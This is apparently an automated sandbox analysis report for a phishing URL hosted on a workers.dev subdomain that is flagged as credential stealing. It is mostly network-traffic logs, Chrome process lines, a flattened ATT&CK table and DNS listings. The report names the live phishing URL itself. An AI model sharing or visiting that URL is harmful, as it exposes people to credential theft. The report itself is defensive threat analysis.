Source: unknownNetwork traffic detected: HTTP traffic on port 58579 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58617 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58659 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 58871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58545 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58605 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58577 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58637 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58627 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58567 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58649 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58533 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58589 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58667 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58529 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58517 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58655 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58552 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58598 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58608 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58633 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58576 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58809
Source: unknownNetwork traffic detected: HTTP traffic on port 58896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58803
Source: unknownNetwork traffic detected: HTTP traffic on port 58645 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58805
Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58800
Source: unknownNetwork traffic detected: HTTP traffic on port 58690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58574 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58657 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58542 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58669 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58530 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58586 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58519 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58618 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58635 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58564 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58619
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58616
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58615
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58618
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58617
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58612
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58611
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58853
Source: unknownNetwork traffic detected: HTTP traffic on port 58687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58614
Source: unknownNetwork traffic detected: HTTP traffic on port 58830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58613
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58621
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58620
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58862
Source: unknownNetwork traffic detected: HTTP traffic on port 58641 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58584 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58601 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58627
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58626
Source: unknownNetwork traffic detected: HTTP traffic on port 58704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58629
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58628
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58623
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58622
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58625
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58624
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58630
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58632
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58631
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58873
Source: unknownNetwork traffic detected: HTTP traffic on port 58876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58623 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58638
Source: unknownNetwork traffic detected: HTTP traffic on port 58537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58637
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58639
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58634
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58633
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58636
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58635
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58641
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58640
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58643
Source: unknownNetwork traffic detected: HTTP traffic on port 58829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58642
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58884
Source: unknownNetwork traffic detected: HTTP traffic on port 58911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58880
Source: unknownNetwork traffic detected: HTTP traffic on port 58716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58653 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58888 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58649
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58648
Source: unknownNetwork traffic detected: HTTP traffic on port 58611 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58645
Source: unknownNetwork traffic detected: HTTP traffic on port 58596 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58644
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58647
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58646
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58652
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58651
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58654
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58653
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58890
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58650
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58891
Source: unknownNetwork traffic detected: HTTP traffic on port 58560 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58631 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58818
Source: unknownNetwork traffic detected: HTTP traffic on port 58923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58814
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58810
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58539 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58811
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58594 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58829
Source: unknownNetwork traffic detected: HTTP traffic on port 58781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58821
Source: unknownNetwork traffic detected: HTTP traffic on port 58852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58823
Source: unknownNetwork traffic detected: HTTP traffic on port 58689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58822
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58830
Source: unknownNetwork traffic detected: HTTP traffic on port 58665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58562 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58839
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58837
Source: unknownNetwork traffic detected: HTTP traffic on port 58572 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58840
Source: unknownNetwork traffic detected: HTTP traffic on port 58643 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58527 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58609
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58608
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58605
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58604
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58607
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:58537 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:58583 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:58637 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:58679 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:58777 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@22/342@124/41
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1996,i,2053602945635669947,100357867303629952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1996,i,2053602945635669947,100357867303629952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Extra Window Memory Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=100%SlashNextCredential Stealing type: Phishing & Social usering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://g.co/dev/maps-no-account0%URL Reputationsafe
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://w3-reporting-nel.reddit.com/reports0%URL Reputationsafe
https://openjsf.org/0%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/styling#cloud_tooling0%URL Reputationsafe
https://support.google.com/fusiontables/answer/9185417).0%URL Reputationsafe
https://developers.google.com/maps/deprecations0%URL Reputationsafe
http://underscorejs.org/LICENSE0%URL Reputationsafe
https://cdn.cookielaw.org/scripttemplates/otSDKStub.js0%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browsers0%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/libraries0%URL Reputationsafe
https://cdn.cookielaw.org/vendorlist/googleData.json0%URL Reputationsafe
https://cdn.cookielaw.org/vendorlist/iab2Data.json0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
starpng.com
104.21.1.55
truefalse
    unknown
    static.cloudflareinsights.com
    104.16.79.73
    truefalse
      unknown
      tls13.taboola.map.fastly.net
      151.101.65.44
      truefalse
        unknown
        kengegame.web.app
        199.36.158.100
        truefalse
          unknown
          www.spark.net
          104.18.41.106
          truefalse
            unknown
            eip-ntt.api.pinterest.com.akahost.net
            2.18.48.37
            truefalse
              unknown
              squarespace.map.fastly.net
              151.101.0.238
              truefalse
                unknown
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalse
                  unknown
                  uploads.codesandbox.io
                  104.18.43.9
                  truefalse
                    unknown
                    code.jquery.com
                    151.101.2.137
                    truefalse
                      unknown
                      px.adentifi.com
                      54.165.51.215
                      truefalse
                        unknown
                        dualstack.tls13.taboola.map.fastly.net
                        151.101.129.44
                        truefalse
                          unknown
                          cm.g.doubleclick.net
                          142.250.185.162
                          truefalse
                            unknown
                            rtb.adentifi.com
                            3.220.154.123
                            truefalse
                              unknown
                              www.google.com
                              172.217.18.100
                              truefalse
                                unknown
                                prod.squarespace.map.fastly.net
                                151.101.128.238
                                truefalse
                                  unknown
                                  ruletridominium.web.app
                                  199.36.158.100
                                  truefalse
                                    unknown
                                    am-vip001.taboola.com
                                    141.226.228.48
                                    truefalse
                                      unknown
                                      performance.squarespace.com
                                      35.186.236.0
                                      truefalse
                                        unknown
                                        a.nel.cloudflare.com
                                        35.190.80.1
                                        truefalse
                                          unknown
                                          static.squarespace.map.fastly.net
                                          151.101.0.237
                                          truefalse
                                            unknown
                                            ax-0001.ax-msedge.net
                                            150.171.27.10
                                            truefalse
                                              unknown
                                              about.christianmingle.com
                                              172.64.152.123
                                              truefalse
                                                unknown
                                                bg.microsoft.map.fastly.net
                                                199.232.210.172
                                                truefalse
                                                  unknown
                                                  dualstack.reddit.map.fastly.net
                                                  151.101.129.140
                                                  truefalse
                                                    unknown
                                                    www.pinclipart.com
                                                    173.208.137.67
                                                    truefalse
                                                      unknown
                                                      reddit.map.fastly.net
                                                      151.101.1.140
                                                      truefalse
                                                        unknown
                                                        dualstack.pinterest.map.fastly.net
                                                        151.101.128.84
                                                        truefalse
                                                          unknown
                                                          chattts-49f1.beszyrecala.workers.dev
                                                          172.67.196.219
                                                          truefalse
                                                            unknown
                                                            cdn.cookielaw.org
                                                            104.18.87.42
                                                            truefalse
                                                              unknown
                                                              geolocation.onetrust.com
                                                              172.64.155.119
                                                              truefalse
                                                                unknown
                                                                alb.reddit.com
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  psb.taboola.com
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    assets.squarespace.com
                                                                    unknown
                                                                    unknownfalse
                                                                      unknown
                                                                      w3-reporting-nel.reddit.com
                                                                      unknown
